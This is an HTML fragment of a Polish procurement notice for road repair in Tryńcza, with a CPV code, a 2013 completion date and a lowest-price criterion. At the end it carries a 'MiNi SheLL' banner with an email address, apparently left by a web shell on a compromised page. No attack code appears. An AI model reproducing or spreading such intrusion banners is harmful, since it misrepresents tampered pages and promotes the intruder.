-	remont drogi w m. Tryńcza nr ewid. 883 w km 0+000-0+160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com